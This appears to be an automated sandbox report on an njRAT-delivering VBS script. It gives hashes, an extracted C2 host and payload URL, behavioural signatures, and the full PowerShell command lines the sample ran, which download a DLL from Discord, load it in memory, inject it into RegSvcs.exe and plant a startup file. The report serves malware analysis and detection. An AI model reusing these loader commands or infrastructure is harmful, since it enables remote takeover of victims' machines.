Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
06-08-2022 06:43
Static task
static1
Behavioral task
behavioral1
Sample
tmpuB1xoC.vbs
Resource
win7-20220715-en
General
-
Target
tmpuB1xoC.vbs
-
Size
757KB
-
MD5
9dc5849357ad8c24dee16b6103c76e07
-
SHA1
71934dc525d7cff4d493a5737d34188dd1906ec4
-
SHA256
2d04a0d8fac45912b00ddc206423b2a0536e2a035642729535852f6d163946ee
-
SHA512
127bc5c32c8811771d2acbeebe1675b64cadae777158e55f10ec724a92396a70ce67c451443470e1eb630834f916a76c8f4c080f2a431119d6fc40e204c297d3
Malware Config
Extracted
https://cdn.discordapp.com/attachments/979582020927774773/980218074567421972/dl.txt
Extracted
njrat
puerto2547.duckdns.org:2547
d52c2b17132548b
-
reg_key
d52c2b17132548b
-
splitter
@!#&^%$
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 536 powershell.exe 15 536 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VU45vy.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VU45vy.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 536 set thread context of 4060 536 powershell.exe RegSvcs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 4508 powershell.exe 4508 powershell.exe 536 powershell.exe 536 powershell.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
Processes:
powershell.exepowershell.exeRegSvcs.exedescription pid process Token: SeDebugPrivilege 4508 powershell.exe Token: SeDebugPrivilege 536 powershell.exe Token: SeDebugPrivilege 4060 RegSvcs.exe Token: 33 4060 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4060 RegSvcs.exe Token: 33 4060 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4060 RegSvcs.exe Token: 33 4060 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4060 RegSvcs.exe Token: 33 4060 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4060 RegSvcs.exe Token: 33 4060 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4060 RegSvcs.exe Token: 33 4060 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4060 RegSvcs.exe Token: 33 4060 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4060 RegSvcs.exe Token: 33 4060 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4060 RegSvcs.exe Token: 33 4060 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4060 RegSvcs.exe Token: 33 4060 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4060 RegSvcs.exe Token: 33 4060 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4060 RegSvcs.exe Token: 33 4060 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4060 RegSvcs.exe Token: 33 4060 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4060 RegSvcs.exe Token: 33 4060 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4060 RegSvcs.exe Token: 33 4060 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4060 RegSvcs.exe Token: 33 4060 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4060 RegSvcs.exe Token: 33 4060 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4060 RegSvcs.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 728 wrote to memory of 4508 728 WScript.exe powershell.exe PID 728 wrote to memory of 4508 728 WScript.exe powershell.exe PID 4508 wrote to memory of 536 4508 powershell.exe powershell.exe PID 4508 wrote to memory of 536 4508 powershell.exe powershell.exe PID 536 wrote to memory of 4060 536 powershell.exe RegSvcs.exe PID 536 wrote to memory of 4060 536 powershell.exe RegSvcs.exe PID 536 wrote to memory of 4060 536 powershell.exe RegSvcs.exe PID 536 wrote to memory of 4060 536 powershell.exe RegSvcs.exe PID 536 wrote to memory of 4060 536 powershell.exe RegSvcs.exe PID 536 wrote to memory of 4060 536 powershell.exe RegSvcs.exe PID 536 wrote to memory of 4060 536 powershell.exe RegSvcs.exe PID 536 wrote to memory of 4060 536 powershell.exe RegSvcs.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmpuB1xoC.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $CglO = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEMAbwBwAHkA☈☈☈wB0AGEAcgB0AH☈☈☈AcABSAG8AZABhAC☈☈☈AJwA7AFsAQgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBTAHkAcwB0AG☈☈☈AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOQA3ADkANQA4ADIAMAAyADAAOQAyADcANwA3ADQANwA3ADMALwA5ADgAMAAyADEAOAAwADcANAA1ADYANwA0ADIAMQA5ADcAMgAvAGQAbAAuAHQAeAB0ACcAKQApADsAWwBTAHkAcwB0AG☈☈☈AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH☈☈☈ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG☈☈☈AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAZgAyADEAOABjAGIAMQA0AGIAMQBkADMALQBiAD☈☈☈ANgBiAC0ANwBlAGQANAAtADgAMQBjAD☈☈☈ALQBlADkAMwA3ADIANgBjAGYAPQBuAG☈☈☈AawBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAB0AC4AcwBvAGQAbwByAHQAYwBlAGwAZQAwADIAJQBwAG0AbwBjAC8AbwAvAG0AbwBjAC4AdABvAHAAcwBwAHAAYQAuAG8AYwBpAG4AbwByAHQAYwBlAGwAZQAtAHAAbQBvAGMALwBiAC8AMAB2AC8AbQBvAGMALgBzAGkAcABhAG☈☈☈AbABnAG8AbwBnAC4AZQBnAGEAcgBvAHQAcwBlAHMAYQBiAG☈☈☈AcgBpAGYALwAvADoAcwBwAHQAdABoACcAIAAsACAAJABSAG8AZABhAEMAbwBwAHkAIAAsACAAJwBWAF☈☈☈ANAA1AHYAeQAnACAAKQApAA==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $CglO.replace('☈☈☈','U') ) );$OWjuxD = $OWjuxD.replace('%CopyStartupRoda%', 'C:\Users\Admin\AppData\Local\Temp\tmpuB1xoC.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\tmpuB1xoC.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://cdn.discordapp.com/attachments/979582020927774773/980218074567421972/dl.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('f218cb14b1d3-b56b-7ed4-81c5-e93726cf=nekot&aidem=tla?txt.sodortcele02%pmoc/o/moc.topsppa.ocinortcele-pmoc/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $RodaCopy , 'VU45vy' ))"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
memory/536-134-0x00007FFDC3FB0000-0x00007FFDC4A71000-memory.dmpFilesize
10.8MB
-
memory/536-137-0x00007FFDC3FB0000-0x00007FFDC4A71000-memory.dmpFilesize
10.8MB
-
memory/536-132-0x0000000000000000-mapping.dmp
-
memory/4060-142-0x00000000059F0000-0x0000000005F94000-memory.dmpFilesize
5.6MB
-
memory/4060-136-0x0000000000406A5E-mapping.dmp
-
memory/4060-135-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/4060-141-0x0000000005340000-0x00000000053DC000-memory.dmpFilesize
624KB
-
memory/4060-143-0x0000000005640000-0x00000000056D2000-memory.dmpFilesize
584KB
-
memory/4060-144-0x0000000005560000-0x000000000556A000-memory.dmpFilesize
40KB
-
memory/4060-145-0x00000000057D0000-0x0000000005836000-memory.dmpFilesize
408KB
-
memory/4508-130-0x0000000000000000-mapping.dmp
-
memory/4508-131-0x00000128D9890000-0x00000128D98B2000-memory.dmpFilesize
136KB
-
memory/4508-140-0x00007FFDC3FB0000-0x00007FFDC4A71000-memory.dmpFilesize
10.8MB
-
memory/4508-133-0x00007FFDC3FB0000-0x00007FFDC4A71000-memory.dmpFilesize
10.8MB